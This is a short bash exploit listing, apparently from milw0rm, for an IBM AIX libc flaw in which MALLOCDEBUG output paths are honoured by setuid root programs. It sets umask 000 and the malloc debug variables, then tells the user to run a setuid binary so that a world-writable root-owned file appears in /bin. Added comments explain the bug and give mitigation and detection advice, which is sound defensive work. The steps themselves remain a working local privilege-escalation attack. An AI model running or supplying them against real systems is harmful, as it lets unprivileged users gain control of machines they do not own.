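#!/bin/bash
#################################################################
# http://root-the.net
#################################################################
# [+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability
# [+] Refer     : securitytracker.com/id?1022261
# [+] Exploit   : Affix
# [+] Tested on : IBM AIX
# [+] Greetz    : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,
#                 str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull
#
# AIX 5.3 ML 5 is where this bad libc code was added.
# Libs Affected :
#   /usr/ccs/lib/libc.a
#   /usr/ccs/lib/libp/libc.a
#################################################################
#
# Purpose of this listing: it records the conditions of the advisory
# referenced above. It sets a permissive umask and the two malloc-debug
# variables, then prints a message; it does not run any program itself.
#
# Why it matters: according to the message printed below, the malloc debug
# report path named in MALLOCDEBUG ("output:<path>") is still acted on when
# a setuid root binary runs, so the report file is created with root's
# authority. With umask 000 no permission bits are masked, which is why the
# resulting file is described as mode 777.
#
# Defender notes:
#   - Mitigation: apply the vendor libc fix listed in the referenced
#     advisory. As a design rule, privileged (setuid/setgid) programs and
#     the runtime they link against should ignore debugging environment
#     variables supplied by the invoking user.
#   - Detection: look for unexpected root-owned, world-writable files in
#     system directories, and for setuid program executions whose
#     environment carries MALLOCTYPE=debug or a MALLOCDEBUG value that
#     contains "output:".
#   - Exposure review: inventory setuid root binaries on affected AIX
#     levels and remove the setuid bit where it is not required.
#
# The next sentence was bare prose in the original listing; bash would try
# to execute it as a command named "Set", so it is kept as a comment.
# Set the following environment variables:

# No permission bits are masked for files created after this point.
umask 000

# Selects the debug allocator and directs its allocation report to a file.
# "/bin/filename" is the original author's placeholder path.
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename

echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."

# milw0rm.com [2009-07-30]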